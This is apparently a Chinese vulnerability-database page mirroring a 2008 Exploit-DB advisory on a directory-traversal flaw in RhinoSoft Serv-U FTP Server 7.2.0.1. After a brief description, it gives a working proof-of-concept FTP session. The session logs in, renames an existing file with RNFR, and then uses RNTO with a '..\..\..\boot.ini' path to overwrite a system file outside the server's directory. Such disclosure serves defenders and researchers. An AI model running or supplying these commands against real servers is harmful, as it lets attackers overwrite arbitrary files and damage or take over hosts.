RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Directory Traversal

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056888 漏洞类型
发布时间 2008-10-03 更新时间 2008-10-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32456
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31563/info

RhinoSoft Serv-U FTP server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.

Serv-U FTP server 7.2.0.1 is vulnerable; other versions may also be affected. 

220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.